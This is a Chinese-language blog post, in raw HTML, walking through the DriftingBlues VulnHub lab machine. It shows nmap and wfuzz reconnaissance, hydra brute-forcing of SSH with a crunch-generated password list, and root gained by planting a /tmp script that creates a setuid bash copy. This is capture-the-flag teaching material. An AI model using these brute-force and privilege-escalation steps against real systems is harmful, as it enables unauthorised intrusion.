<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="信息收集主机探测1arp-scan -l   端口扫描1nmap -sC -sV -p- 192.168.62.172   只开放了22和80端口，只能先访问80端口看一下有没有什么信息  好像没什么东西，扫了目录也没什么信息  右键查看源码，看到了一串疑似base64编码的字符串，到在线网站上转换一下，这应该是一个路径  访问一下，这个很明显了，到在线的ook!解密网站解密一下  是一个提示，应">
<meta property="og:type" content="article">
<meta property="og:title" content="driftingblues VulnHub Walkthrough">
<meta property="og:url" content="http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/index.html">
<meta property="og:site_name" content="colind0pe&#39;s blog">
<meta property="og:description" content="信息收集主机探测1arp-scan -l   端口扫描1nmap -sC -sV -p- 192.168.62.172   只开放了22和80端口，只能先访问80端口看一下有没有什么信息  好像没什么东西，扫了目录也没什么信息  右键查看源码，看到了一串疑似base64编码的字符串，到在线网站上转换一下，这应该是一个路径  访问一下，这个很明显了，到在线的ook!解密网站解密一下  是一个提示，应">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/10/12/OmNE8evaC2VQzZc.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/9LTWKF2Irw3bBn4.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/3aTXBh7Au61snxe.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/89FHODkPsiIKq3A.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/F4z37IMB6HRTbN8.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/f3Y5qmlHkdy4UO2.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/2A8K7SIUoW3ZYCJ.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/yrY1VEOUn7ZNJuf.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/m8XTnM4pqJRSxYI.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/IhLMdEA75BqWY8J.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/9HeMXPp4nxUc5T3.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/rQZJMdo6itON41X.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/h8NRS47k5FwcyQP.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/hqH8zidLMpy2B4b.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/lO2CwcisZyFhX7Q.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/LKM18PeBjnQ3EmN.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/DEn1wX8sbvx3KPy.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/tR6dFViCTaYM3gk.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/R6CWvfVqErO29Az.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/y8jaFm2eGTYUiXo.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/jWGusDP8aTNwCgS.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/lRnyG9txiQKuYW5.png">
<meta property="og:image" content="https://i.loli.net/2021/10/12/bWHGwDhZx1cTntf.png">
<meta property="article:published_time" content="2021-10-12T08:24:52.000Z">
<meta property="article:modified_time" content="2021-12-25T12:19:50.096Z">
<meta property="article:author" content="colind0pe">
<meta property="article:tag" content="VulnHub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/10/12/OmNE8evaC2VQzZc.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>driftingblues VulnHub Walkthrough</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2021/10/12/driftingblues2-VulnHub-Walkthrough/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2021/08/18/HackTheBox-Shield/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&text=driftingblues VulnHub Walkthrough"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&is_video=false&description=driftingblues VulnHub Walkthrough"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=driftingblues VulnHub Walkthrough&body=Check out this article: http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&name=driftingblues VulnHub Walkthrough&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&t=driftingblues VulnHub Walkthrough"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.1.</span> <span class="toc-text">主机探测</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.2.</span> <span class="toc-text">端口扫描</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">3.</span> <span class="toc-text">提权</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        driftingblues VulnHub Walkthrough
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">colind0pe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-10-12T08:24:52.000Z" itemprop="datePublished">2021-10-12</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/VulnHub/" rel="tag">VulnHub</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><h4 id="主机探测"><a href="#主机探测" class="headerlink" title="主机探测"></a>主机探测</h4><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">arp-scan -l</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/12/OmNE8evaC2VQzZc.png"></p>
<h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">nmap</span> -sC -sV -p- <span class="number">192.168.62.172</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/12/9LTWKF2Irw3bBn4.png"></p>
<p>只开放了22和80端口，只能先访问80端口看一下有没有什么信息</p>
<p><img src="https://i.loli.net/2021/10/12/3aTXBh7Au61snxe.png"></p>
<p>好像没什么东西，扫了目录也没什么信息</p>
<p><img src="https://i.loli.net/2021/10/12/89FHODkPsiIKq3A.png"></p>
<p>右键查看源码，看到了一串疑似base64编码的字符串，到在线网站上转换一下，这应该是一个路径</p>
<p><img src="https://i.loli.net/2021/10/12/F4z37IMB6HRTbN8.png"></p>
<p>访问一下，这个很明显了，到在线的ook!解密网站解密一下</p>
<p><img src="https://i.loli.net/2021/10/12/f3Y5qmlHkdy4UO2.png"></p>
<p>是一个提示，应该是要修改host文件</p>
<p><img src="https://i.loli.net/2021/10/12/2A8K7SIUoW3ZYCJ.png"></p>
<p>在主页上可以看到一个域名，尝试添加到host再访问</p>
<p><img src="https://i.loli.net/2021/10/12/yrY1VEOUn7ZNJuf.png"></p>
<p><img src="https://i.loli.net/2021/10/12/m8XTnM4pqJRSxYI.png"></p>
<p>重新扫目录还是没有发现，那就试试爆破子域名</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wfuzz -u driftingblues.box -w <span class="regexp">/home/</span>colin<span class="regexp">/文档/</span>fuzzDicts<span class="regexp">/subdomainDicts/m</span>ain.txt -H <span class="string">&quot;Host:FUZZ.driftingblues.box&quot;</span> --hw <span class="number">570</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/12/IhLMdEA75BqWY8J.png"></p>
<p>直接访问解析不了，需要再修改一下host</p>
<p><img src="https://i.loli.net/2021/10/12/9HeMXPp4nxUc5T3.png"></p>
<p>访问一下</p>
<p><img src="https://i.loli.net/2021/10/12/rQZJMdo6itON41X.png"></p>
<p>再扫一次目录，发现有robots.txt</p>
<p><img src="https://i.loli.net/2021/10/12/h8NRS47k5FwcyQP.png"></p>
<p>访问一下，看到给了一些路径</p>
<p><img src="https://i.loli.net/2021/10/12/hqH8zidLMpy2B4b.png"></p>
<p>查看ssh_cred.txt，给了提示</p>
<p><img src="https://i.loli.net/2021/10/12/lO2CwcisZyFhX7Q.png"></p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>ssh登录的密码是<code>1mw4ckyyucky*</code>，目前还缺一位数字，一共十个可能的密码，先生成一下</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">crunch</span> <span class="number">13</span> <span class="number">13</span> -t <span class="number">1</span>mw<span class="number">4</span>ckyyucky% &gt; pass</span><br></pre></td></tr></table></figure>

<p>看一下我们生成的密码集合</p>
<p><img src="https://i.loli.net/2021/10/12/LKM18PeBjnQ3EmN.png"></p>
<p>接下来尝试爆破ssh登录密码，根据前面访问<code>test.driftingblues.box</code>的提示，用户名应该是<code>eric</code></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l eric -P pass ssh:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">62.172</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/12/DEn1wX8sbvx3KPy.png"></p>
<p>找到密码了，直接登录ssh</p>
<p><img src="https://i.loli.net/2021/10/12/tR6dFViCTaYM3gk.png"></p>
<p>直接获取第一个flag</p>
<img src="https://i.loli.net/2021/10/12/R6CWvfVqErO29Az.png" style="zoom:67%;" />

<h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">uname -a</span><br><span class="line"><span class="keyword">find</span> <span class="regexp">/ -perm -u=s -type f 2&gt;/</span>dev/<span class="keyword">null</span></span><br><span class="line">getcap -r  <span class="regexp">/ 2&gt;/</span>dev/<span class="keyword">null</span></span><br></pre></td></tr></table></figure>

<p>看了一遍都没有什么发现，只能看一看有没有什么其他可以利用的地方</p>
<p>在备份目录下有个backup.sh，看一下内容</p>
<p><img src="https://i.loli.net/2021/10/12/y8jaFm2eGTYUiXo.png"></p>
<p>有一个sudo执行的/tmp/emergency，但是tmp目录下是没有这个文件的，所以应该通过新建文件来提权</p>
<p>思路是这样，但还是不知道怎么操作，只能看看别人的walkthrough了</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> &#x27;cp <span class="string">/bin/bash</span> <span class="string">/tmp/getroot</span>; chmod +s <span class="string">/tmp/getroot</span>&#x27; &gt; <span class="string">/tmp/emergency</span></span><br><span class="line"><span class="comment">#系统执行backup.up，以sudo执行emergency，会将/bin/bash复制到tmp，并赋予执行权限</span></span><br><span class="line">chmod +x emergency</span><br><span class="line"><span class="string">./getroot</span> -p</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/12/jWGusDP8aTNwCgS.png"></p>
<p><img src="https://i.loli.net/2021/10/12/lRnyG9txiQKuYW5.png"></p>
<p>现在可以获取第二个flag了</p>
<img src="https://i.loli.net/2021/10/12/bWHGwDhZx1cTntf.png" style="zoom:67%;" />

<blockquote>
<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45922278/article/details/115277255">https://blog.csdn.net/weixin_45922278/article/details/115277255</a></p>
</blockquote>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.1.</span> <span class="toc-text">主机探测</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.2.</span> <span class="toc-text">端口扫描</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">3.</span> <span class="toc-text">提权</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&text=driftingblues VulnHub Walkthrough"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&is_video=false&description=driftingblues VulnHub Walkthrough"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=driftingblues VulnHub Walkthrough&body=Check out this article: http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&title=driftingblues VulnHub Walkthrough"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&name=driftingblues VulnHub Walkthrough&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/10/12/driftingblues-VulnHub-Walkthrough/&t=driftingblues VulnHub Walkthrough"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2022
    colind0pe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
